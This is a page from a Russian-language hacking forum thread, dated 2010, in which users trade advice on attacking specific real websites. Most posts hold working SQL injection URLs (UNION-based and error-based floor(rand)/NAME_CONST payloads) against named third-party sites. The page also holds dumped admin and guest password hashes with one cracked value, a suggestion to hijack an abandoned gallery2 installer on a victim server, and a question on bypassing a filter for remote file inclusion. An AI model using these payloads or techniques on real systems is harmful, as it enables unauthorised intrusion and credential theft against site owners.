ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12731  
Старый 24.04.2010, 19:36
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

thanks как я недодумался....
 
Ответить с цитированием

  #12732  
Старый 24.04.2010, 22:34
$T@$
Новичок
Регистрация: 29.03.2010
Сообщений: 4
С нами: 8484289

Репутация: 2
По умолчанию

WordPress 2.7.1
Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?

Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
 
Ответить с цитированием

  #12733  
Старый 25.04.2010, 11:42
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!
 
Ответить с цитированием

  #12734  
Старый 25.04.2010, 12:41
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

Цитата:
Сообщение от YuNi|[c  
народ прошу помоши в раскрутке через floor rand

вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(version(),0x3a,floor(rand()*2)) x%20from%20(select%201%20union%20select%202)a%20gr oup%20by%20x%20limit%201)--

_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(database(),0x3a,floor(rand()*2) )x%20from%20(select%201%20union%20select%202)a%20g roup%20by%20x%20limit%201)--

может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #12735  
Старый 25.04.2010, 14:25
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от FlaktW  
На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!

прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.

http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
 
Ответить с цитированием

  #12736  
Старый 25.04.2010, 16:04
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами: 9122965

Репутация: 36
По умолчанию

подскажите что это?
Код:
http://www.hack0wn.com/view.php?xroot=271.0+order+by+1--&cat=exploits
есть ли тут уязвимость?
 
Ответить с цитированием

  #12737  
Старый 25.04.2010, 16:51
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
 
Ответить с цитированием

  #12738  
Старый 25.04.2010, 17:14
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);

Или без вариантов?

PS Можно айпи дать напрямую, но http съедается..

Последний раз редактировалось budden; 25.04.2010 в 17:27..
 
Ответить с цитированием

  #12739  
Старый 25.04.2010, 18:07
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

если FreeBsD криво настроенный - то можно содержимое папочек увидеть
 
Ответить с цитированием

  #12740  
Старый 25.04.2010, 18:51
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами: 9509918

Репутация: 30
По умолчанию

Цитата:
Сообщение от Pashkela  
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.